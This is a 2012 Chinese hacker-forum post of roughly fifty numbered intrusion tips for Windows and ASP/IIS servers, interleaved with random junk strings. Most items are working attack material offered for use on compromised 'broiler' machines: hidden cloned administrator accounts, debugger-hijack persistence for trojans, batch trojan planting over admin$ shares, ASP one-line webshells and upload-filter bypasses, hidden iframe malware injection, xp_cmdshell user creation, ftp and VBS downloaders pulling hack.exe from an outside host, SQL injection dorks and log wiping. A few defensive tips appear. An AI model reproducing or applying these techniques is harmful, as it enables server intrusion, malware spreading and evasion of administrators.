找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2253|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,# a8 L- l8 U# v! B4 \2 H
cacls C:\windows\system32 /G hqw20:R
3 f) L, G# w, _! _( t: f5 Z思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
- H$ z: Y0 l4 {7 I+ H8 J恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. A& R9 Q& z6 I- [' w- }. g
; J0 h* Z4 W) m3 g: R! o6 p2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。. Y  I7 N" z( X1 a' c5 @

, p" w1 t; l! f( ~4 q7 u+ H1 q3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。* V) n4 J* ~- M% f+ I

/ z3 u- j- o! i! A% o( N4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# x7 z  [$ B( Z1 O1 [" Y. y- K, g! p  Z* Q& ]
5、利用INF文件来修改注册表
7 c: `; A6 N* `5 @[Version]
* U+ c1 a1 |8 t! z3 ~Signature="$CHICAGO$"; a# x3 y+ v& o% t
[Defaultinstall]5 H6 w! p8 G# {1 e
addREG=Ating/ e* a) G8 n, C) v; X
[Ating]
: R9 g# j& Q1 f6 u2 THKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"( b! z& f, _1 [
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:3 _- t' R2 p3 @# z: Q; `
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径+ E, _1 ~, [7 l$ o6 C0 O' H2 Y: X  A% u
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU4 V1 ~( K$ m& O. U; g; F4 n0 I1 R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
6 v! S1 {0 n# f2 gHKEY_CURRENT_CONFIG 简写为 HKCC
6 V3 |: Z5 Y5 A4 h( z+ }3 {0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
' [9 e$ m# d% `( p$ z"1"这里代表是写入或删除注册表键值中的具体数据
( B/ @1 a2 F3 C4 r( V6 g" e
# h4 t1 E' v# n. \7 V9 O6 @4 h, j3 [6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,% w3 ^5 v$ Z" \" }& n
多了一步就是在防火墙里添加个端口,然后导出其键值/ {; x; x" L% V" h  D% a
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]( v0 Z/ f- H1 Y) d$ o

; l' |& _9 h1 j4 j' ]# c7 N7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
5 _( X: J  R5 _在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。/ r& ]: r/ ]. a; Z6 L/ D# v3 C

2 i$ L1 {" |. c  Y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。: Z3 q4 {& B6 v
$ k. [% Z# s+ k4 U" u
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,; W; r* k; [  }, P9 A3 D
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
( t* N! x7 ]6 I5 x4 b! J& C" A% t8 g$ @/ s) e
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
0 ?  d0 v( z7 e. r6 t- y5 E  F8 f1 w8 W+ k6 M# F0 B3 w# `
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
' J! o3 q+ h- u, c2 |9 E3 F% \* ]用法:xsniff –pass –hide –log pass.txt$ k( G4 U' I; \! _. _7 U4 J8 e+ \

1 d3 u8 P( C, Y5 D0 w3 ^12、google搜索的艺术
" }* c. F7 k3 c0 z3 W/ O搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”' a% [2 g7 b3 [6 B
或“字符串的语法错误”可以找到很多sql注入漏洞。) P3 ?- C/ u0 S; ?) N/ N6 o. F9 p5 u

: h" f; T" |$ t13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。/ R$ M1 t* ?7 h5 f

5 ~+ m' m% k; H4 a4 a; |14、cmd中输入 nc –vv –l –p 1987
' S) B1 H' F3 W( ?8 z) Q8 i# k6 n做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
) V+ y0 e' Q( [3 o  `* ?* n' k- }7 S7 A0 w+ |
15、制作T++木马,先写个ating.hta文件,内容为( ~2 s+ v. m1 K, w3 H0 A4 x
<script language="VBScript">
6 k- R+ T5 U$ M% Wset wshshell=createobject ("wscript.shell" )7 f6 Z$ R% R- Y$ P7 t+ b1 G: X
a=wshshell.run("你马的名称",1)
3 m3 W& n4 p! f. S1 a2 qwindow.close
. I3 G# ]$ y: L+ B+ T+ P2 H- X</script>) o$ t& Q  ?) M( P
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。8 ~" ~6 T4 _% ?

$ o1 {8 {. K2 t: g2 z16、搜索栏里输入
! `) p+ e3 w; F关键字%'and 1=1 and '%'='% t- C# i) X2 L
关键字%'and 1=2 and '%'='$ T; f% }% H- r' Q. y2 O) r
比较不同处 可以作为注入的特征字符
$ y" A6 `& w9 n0 F) M+ r, s- L$ J, Z
17、挂马代码<html>
  e' o# y" R- o/ m+ S<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>2 B) ?4 G2 v0 p8 U
</html>
0 A( p/ ~+ V6 l2 a% X5 D, D. ~7 C" b- l# E! `3 r* y
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,2 ^* p2 z! u" ?- v
net localgroup administrators还是可以看出Guest是管理员来。7 C* k4 G% Y3 O+ O# E
; k! y" g3 y0 A' R
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等5 M: m  Y* M" _6 C5 b; O3 z
用法: 安装: instsrv.exe 服务名称 路径5 s) W  |; D: D) h" k0 k- z) s
卸载: instsrv.exe 服务名称 REMOVE8 p, o0 ~( g7 h+ r4 t9 n
6 S1 L" L8 m4 Z# r
- x6 e  L0 W9 y
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉7 t* u9 ?/ m* l' X: C9 b* G! u
不能注入时要第一时间想到%5c暴库。
; c  u4 `8 H, I, c% C; {1 I  a( w" `1 D5 ?3 e. E
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. f& p7 o' `! E
( |4 M0 D8 }6 z; E6 d23、缺少xp_cmdshell时
/ w, I2 H+ C) k3 ]# x( Y尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) O: B4 I7 p/ K, ^8 B' D假如恢复不成功,可以尝试直接加用户(针对开3389的)& V2 C; D# h" ^0 @, I/ v
declare @o int* s& J2 @0 e% s1 `) t
exec sp_oacreate 'wscript.shell',@o out
: F* A8 E* X1 O+ {1 D0 Xexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) O5 }! v/ r( S7 L3 ~  a, B  x) \" C. n
24.批量种植木马.bat
3 ?# w7 {3 \/ K  m8 h8 ?: Y) F0 Sfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
- b. [; v+ @1 Ofor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
- C" S9 D" z- D( O) T% D# f) P扫描地址.txt里每个主机名一行 用\\开头* p6 P8 S, D$ N. [. U$ a$ b

; _2 w! v/ J0 n2 }% y25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。5 J; i2 r; c- t4 H
7 R4 j7 ]+ g$ [
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.7 e1 [6 Q0 f3 M. |: D. X
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
, k3 a: Y8 A( y.cer 等后缀的文件夹下都可以运行任何后缀的asp木马, b3 I  c. }9 l$ x9 e: c0 }
; T% D- b, ?3 m: Z
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP# F0 H" n0 R; J2 A
然后用#clear logg和#clear line vty *删除日志
0 S* k* m8 V$ ]; D
3 F/ x4 q, Y2 p+ q# j1 L/ T28、电脑坏了省去重新安装系统的方法4 W6 K2 S9 c6 s+ {" d
纯dos下执行,
6 q: n& S, G3 P3 W2 x; Ixp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
5 E' T: Q+ i# W$ k* l& O0 L2 _2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
7 {/ l" M( h  s/ D9 B7 T/ L; T
9 W2 I, _6 g* y* j) v29、解决TCP/IP筛选 在注册表里有三处,分别是:" h# ^! }  b% ^# S# w7 e# u: N6 D* g9 X; ?
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip3 R  ]8 s' V2 A& h, d5 k9 n! f9 z* a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip9 `5 K& V# ~) Y+ _0 u3 V) o
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) x6 s% |+ w; ?1 a  z* \
分别用
/ v  t! ^+ M7 F& c+ nregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- f  J# j. n3 U$ J
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 p2 H8 \9 ^0 E/ b
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 h$ Y( _3 L, X' D: D" j' w
命令来导出注册表项) Z  v% H" q8 T4 W, Q' k
然后把三个文件里的EnableSecurityFilters"=dword:00000001,% a: A/ H% [& p& C+ m9 c/ b6 i$ E
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用7 W) Y8 T- o  c& _
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
7 y! N" P3 `7 O6 N
3 H! g8 m1 K: t; z, {30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
) K5 J! f2 W; ~* M! T7 BSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. \  K6 |& v  R. {

' A3 M, a) S& Y) Z- |7 \5 R31、全手工打造开3389工具' c* E& f. ?. y- ]7 _/ D
打开记事本,编辑内容如下:
+ |  g  F& l, K( wecho [Components] > c:\sql
6 Z6 U0 ?7 |' m9 v2 e: Mecho TSEnable = on >> c:\sql
5 r  g% F. [+ ]$ X4 Wsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q4 S, y- X1 Y; |& s: M: Z  \% B
编辑好后存为BAT文件,上传至肉鸡,执行8 u6 r2 P; C& B. D( `  K$ C
/ Z2 z4 [! ]' ^& r  y/ g' x% z! X0 C
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
3 N- l6 Q4 p; k3 B# ^! _" h) i8 K/ }) o3 d" \( q/ ]8 ^
33、让服务器重启0 z% }. A5 \- n. H
写个bat死循环:& V* b" C' Q6 i" ~* d
@echo off- _3 w2 K6 x+ |3 L# T" x. S
:loop14 t# y+ N) n+ Z" ?+ A/ ]
cls3 F; V/ Z! N* a' K# S9 M, h( q
start cmd.exe
# T; p' h: F/ l  J) u4 ?5 pgoto loop1% I* \8 r% W) c! q
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 n% ]" _3 V$ X" U# ?* v; R$ o- C4 P; H% i+ a" q
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,' `' |$ q8 r" c! j: B, S
@echo off$ a+ ]6 Z2 K# e$ Q8 U
date /t >c:/3389.txt
2 U! d5 e& q/ L$ s1 l# Itime /t >>c:/3389.txt" K' y3 X% q/ q4 `5 \. b. J$ r
attrib +s +h c:/3389.bat3 f" L/ q* u* Z2 \2 K3 s8 H
attrib +s +h c:/3389.txt
7 b, O' K) ^* S! d! W- `) T0 {netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt6 ?& b2 N! o8 ^4 K- T
并保存为3389.bat
+ f' K( y9 Y2 L! F0 u- ]2 i- b打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号5 @8 Z6 Y+ r# N

! M9 ^" n1 Y. J7 F35、有时候提不了权限的话,试试这个命令,在命令行里输入:0 e  Q; H* _5 L* |
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
' m+ F# s6 ^; u7 T3 J* J- p输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
: b* A4 L; ?5 m: S+ x- C' [, w9 ]2 L4 B" k$ U8 A- o3 Z2 u
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
8 P- _$ N. C# _) F7 m/ ~$ K4 ?+ iecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址5 T& g6 {; B( ^# P" w: ?
echo 你的FTP账号 >>c:\1.bat //输入账号! x, ~9 x2 W( n* I
echo 你的FTP密码 >>c:\1.bat //输入密码
! ~( z% ~" Z4 J) }) g3 i! p& lecho bin >>c:\1.bat //登入
( n8 F+ {8 f, vecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么) w' ]5 T0 g+ f& |" Q  t
echo bye >>c:\1.bat //退出
1 X5 _8 x8 y8 U5 G然后执行ftp -s:c:\1.bat即可
. f! L2 N7 p& s6 l# I
2 ]" C: f) E4 A$ N3 x, K! c37、修改注册表开3389两法7 k) o; W+ Q* s8 l  `
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
1 y" d) t9 R& U, s. E# C9 Qecho Windows Registry Editor Version 5.00 >>3389.reg; R; G4 D7 J1 I3 k/ `9 N3 k. [
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg3 f9 ~- m. L. k+ |0 v+ x" }
echo "Enabled"="0" >>3389.reg6 H. y; u2 V' Q6 O! v" F) b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows5 s9 u6 e% A7 s, y4 d6 P
NT\CurrentVersion\Winlogon] >>3389.reg6 _0 ?7 \: P* c( |
echo "ShutdownWithoutLogon"="0" >>3389.reg
# u% l% b$ Z1 P( y4 o5 |2 Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]4 t0 g9 @! c0 D: d! t( r, Y3 h
>>3389.reg
6 c2 R  X/ q( Z+ x9 |3 Techo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
& }# [' [2 ^* m/ T/ A- Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
2 ^5 a2 ~- w! G( ~+ y>>3389.reg
; H- G) d5 P  |8 n* \echo "TSEnabled"=dword:00000001 >>3389.reg
; O9 ?% S$ q* Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
0 N: e7 k5 ?2 D+ ?( V+ D1 O% ?echo "Start"=dword:00000002 >>3389.reg
# H, }& z3 M" \. J8 r4 d- y/ wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
: p$ X5 F; v$ |- A5 _& @>>3389.reg
9 _1 s" T4 V1 w% x8 y5 |( Yecho "Start"=dword:00000002 >>3389.reg
3 h- k& C- m4 E9 b5 techo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' Z3 p- S! c" O5 ]
echo "Hotkey"="1" >>3389.reg
  L( O8 [5 W2 G( A2 X) l/ ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& ^1 P" r' k  j7 zServer\Wds\rdpwd\Tds\tcp] >>3389.reg
3 t! ~+ o" j; {% k4 z" C! w  pecho "PortNumber"=dword:00000D3D >>3389.reg
& ~* b8 Q! ~8 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 ?' J6 G3 G- LServer\WinStations\RDP-Tcp] >>3389.reg- Y6 D; M* {# m
echo "PortNumber"=dword:00000D3D >>3389.reg
& K/ g  L6 y& u* [4 |+ H+ A% g把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。# {+ }% [  m7 g& }2 q
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, i9 s* `: I9 Z因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
# b3 \; I' J6 F5 _" H5 ^' [4 ](2)winxp和win2003终端开启
3 s2 U) \& `* \, o4 Q/ M用以下ECHO代码写一个REG文件:
/ j4 E, j6 p. H, x+ eecho Windows Registry Editor Version 5.00>>3389.reg" `' A/ ^8 A! k, f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& S. @8 x2 J% T! A9 j+ O! a. l, T4 SServer]>>3389.reg
  v1 V. u# h: `echo "fDenyTSConnections"=dword:00000000>>3389.reg
! e' _0 i: r5 H$ `) g+ Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) ^; j( L1 l! \2 e
Server\Wds\rdpwd\Tds\tcp]>>3389.reg7 t7 g8 s* a' G2 n* Y
echo "PortNumber"=dword:00000d3d>>3389.reg: ?9 K, y6 r7 q2 a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ f! ]" D7 g# CServer\WinStations\RDP-Tcp]>>3389.reg
0 V5 f" W1 \$ j9 Z- L- g  Lecho "PortNumber"=dword:00000d3d>>3389.reg
  `5 W6 V+ `+ e! f9 }然后regedit /s 3389.reg del 3389.reg
$ \' @. a0 `0 g- ~! c% RXP下不论开终端还是改终端端口都不需重启
3 z$ C5 U6 S7 g7 p; r, k$ r
, q+ l% A8 K; A1 ?/ k( P+ k* ?* E38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
' R" H1 N& `' d5 j  r8 u- J用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'5 M3 ^8 u3 r. Y9 K& w, W: w
8 j3 ^$ t' l) @7 D5 R6 T6 B
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 x: _3 P9 m7 U# r1 g1 R0 f  E(1)数据库文件名应复杂并要有特殊字符
+ x# D6 B8 N. |: @(2)不要把数据库名称写在conn.asp里,要用ODBC数据源- B+ X* M& U' [
将conn.asp文档中的
( F! ^7 D7 p4 ~+ _0 XDBPath = Server.MapPath("数据库.mdb")
8 T: @( F2 a% jconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath+ y- H) N3 N' N# G' f5 ]* S& a3 n

" M) Z+ S! J5 @3 J  \修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
' o4 t# j8 Z2 f: t* x(3)不放在WEB目录里
' @; N8 l  f% s3 b. d; r3 F9 a; h' G4 k! r' D; D% C0 a) C2 I5 S
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
; C2 Q3 i1 j+ S! P% J9 I  y: M可以写两个bat文件
4 D1 O0 a! |: I  f8 t: v@echo off8 f9 L1 L& ]: d
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe( F0 i& T" m7 e, g% p4 S
@del c:\winnt\system32\query.exe" S3 z7 K9 S; f- O' ?! q! e7 K3 H; W
@del %SYSTEMROOT%\system32\dllcache\query.exe2 f2 @  V$ @  |( J! v! w9 X" h
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) b: g( E$ N; i
5 O+ [. c3 x' L! C
@echo off/ d$ `+ f0 ~+ {: \0 z' j; Q
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe; u4 h, f8 T# @0 x0 {
@del c:\winnt\system32\tsadmin.exe8 H% r7 w8 H0 b1 ~
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex8 ~4 J* m7 k- Q) G) ^) k. C9 B1 P

: ]! U- i( N( Q) s% M0 H. H41、映射对方盘符
- ~) z! |2 ^1 W- J) ?5 U. E) ]2 ~telnet到他的机器上," v6 ]9 g0 Y/ n. r
net share 查看有没有默认共享 如果没有,那么就接着运行
& ~( z' x/ H; z, M9 a, Enet share c$=c:
. e, |8 \8 B: L5 ^& }1 Y0 n& enet share现在有c$
1 T# u* g5 T! q在自己的机器上运行
& [) E' t/ T! o- onet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K6 e3 }- J  P  f# v0 \- e1 w

6 {3 e3 R$ e1 c& j' a; a- k42、一些很有用的老知识$ K% F7 m8 A# V2 q4 X" r5 }
type c:\boot.ini ( 查看系统版本 )
/ R+ I. _8 E6 b, a% f$ Z! g3 Hnet start (查看已经启动的服务)
% B. m- ~0 k, d4 @query user ( 查看当前终端连接 )
* x5 V$ z$ m# enet user ( 查看当前用户 )
8 G/ u: C! A: l7 U9 ynet user 用户 密码/add ( 建立账号 )/ [7 |6 B7 Z" t
net localgroup administrators 用户 /add (提升某用户为管理员)- n& ]: k0 A) r4 ^% i
ipconfig -all ( 查看IP什么的 )
9 J- o  x3 S# G/ @. C; Cnetstat -an ( 查看当前网络状态 )
+ F9 z2 q: s" r1 a6 B+ r% @& @findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
' V3 V6 I# D$ F+ X8 D- y克隆时Administrator对应1F4
0 r, Z' H) v2 {; l! u2 q5 S; Nguest对应1F5
" |* g4 Y4 E9 A2 Mtsinternetuser对应3E8
8 ~8 e" J  `7 G( S1 T( B8 O$ ~5 h
43、如果对方没开3389,但是装了Remote Administrator Service" e" Y8 A! k3 Q) I9 G. D# B
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ C1 v2 T; `* t( X2 B9 l解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
7 F+ R: p& R& u8 J先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
! c5 S5 t% I, R. m- l$ o- I. u& H( H' y
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
# z5 B, {) e/ _: f' m& K本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
* i) Z: Q+ N& _0 ]9 X7 i( b/ e6 f: A) e/ K- n
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
. v7 l/ q) n; _( g( secho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
, P* ?1 E3 m; v5 G% h1 b, j^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =' V4 J- t! t5 ]2 [9 A( f; \
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
. T% H! S4 m. ]1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
1 A3 n9 Y8 N9 l! h& w% Q(这是完整的一句话,其中没有换行符)  S/ ^2 y/ B' @, v
然后下载:, t  V1 a% G1 d' K6 p/ p9 D5 Q
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
) z& S5 H. d2 v, f# H7 r  D
4 ?2 f, q) K7 J% O. r46、一句话木马成功依赖于两个条件:, K/ i2 V1 `7 O9 B
1、服务端没有禁止adodb.Stream或FSO组件
0 X0 K7 s0 C2 \6 f2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。/ ~9 ?2 b: \' P* B- ^- ~
. H7 W, e$ g- |8 a
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. N" X( S3 J) T  g! M;alter database utsz set RECOVERY FULL--
3 T/ G- }& G4 P' s' R, X;create table cmd (a image)--
1 |4 P& {8 x, F$ G7 p;backup log utsz to disk = 'D:\cmd' with init--
) L$ e7 V2 [, W, I; f;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--: S+ o% v3 G4 n
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--. g6 ?# w, m' q+ h
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。  H6 X$ z! C8 e0 D$ E" K
1 A9 e- ~: z- S" u
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
: V( A: C* [( U; [8 L
1 X2 ^. F, S( r: t" v3 ?用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options9 c* m' g5 M, v- E) E: ?! X
所有会话用 'all'。1 q( }9 @# H/ \- H( w6 d' i' c( `
-s sessionid 列出会话的信息。/ f" Y3 ^& ?8 j
-k sessionid 终止会话。0 m5 ?( Q& j5 ]$ w9 C
-m sessionid 发送消息到会话。. u2 _/ S/ Z5 G* ]/ b* v8 l- ?) @

0 b, U! @: [- F; Kconfig 配置 telnet 服务器参数。8 m7 x; |* F$ S

" P( }0 v: \: J7 @7 ]4 C; ?common_options 为:
8 h3 }" P" W$ `: |-u user 指定要使用其凭据的用户/ S7 Q  E' H2 G/ w1 o/ i7 R
-p password 用户密码
+ `9 _9 c6 o0 B1 r; J. B* q
8 ]7 D* ~' y* {: ?config_options 为:/ X: g0 \7 t8 w0 l& I9 F
dom = domain 设定用户的默认域
9 D7 x8 L9 l! Rctrlakeymap = yes|no 设定 ALT 键的映射
( N, a' ~. Z0 D& atimeout = hh:mm:ss 设定空闲会话超时值# M, h  d* @/ o) G0 J9 b0 s
timeoutactive = yes|no 启用空闲会话。
' ]& X8 ^0 ]) c+ I' _8 mmaxfail = attempts 设定断开前失败的登录企图数。& y0 {. ~6 i7 ]1 v% Z1 p
maxconn = connections 设定最大连接数。
+ g* z. f7 j' A8 a5 h- }port = number 设定 telnet 端口。
, Q3 x* b& e9 P. asec = [+/-]NTLM [+/-]passwd9 l, |+ B' j/ w" N( I: F
设定身份验证机构
' X4 I( o2 U8 k, V6 y2 Hfname = file 指定审计文件名。/ I) A$ P, w9 A" Q
fsize = size 指定审计文件的最大尺寸(MB)。
4 g8 ~  \, S9 S  {4 h. umode = console|stream 指定操作模式。7 q$ F) R2 ]9 l. l0 u5 R1 o9 X" z0 o
auditlocation = eventlog|file|both8 u- f- e" V8 p' f
指定记录地点
8 F4 s* l! U) T- o6 J  W( S- aaudit = [+/-]user [+/-]fail [+/-]admin  G5 a; k" p& v7 E. E

& A7 |- {1 x' s2 L$ x9 [# t, O, g. ?" ]49、例如:在IE上访问:7 N) i) _$ |7 a4 J0 H
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/# c- o, s2 k# j4 x" v
hack.txt里面的代码是:
8 b# N7 s- D0 I; X( _- x6 l: m# `<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">5 N2 K2 M* u9 A, x2 X8 w% R
把这个hack.txt发到你空间就可以了!
* m/ e) {; K0 Z  T. r7 R# x* X这个可以利用来做网马哦!
% q5 C5 _1 o6 D
* I! f# U6 f+ l$ l2 ?# Z; y7 O50、autorun的病毒可以通过手动限制!8 D0 k7 ]& l: n% V- E# g( a
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!, U  X5 p2 E  c; v1 _: C' }- ~
2,打开盘符用右键打开!切忌双击盘符~
! x& I; v9 k7 [/ L9 \3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!: {& p0 T6 \+ A; s; q
# Y5 _  b" N# V  |
51、log备份时的一句话木马:
: ^. o9 V4 p/ t: i. T% sa).<%%25Execute(request("go"))%%25>
! E, o8 a( |- N2 ?. p9 x- b! nb).<%Execute(request("go"))%>3 ~* O3 S6 i) Z& [: ~% R8 U
c).%><%execute request("go")%><%
5 y; z- ^+ t# Gd).<script language=VBScript runat=server>execute request("sb")</Script>
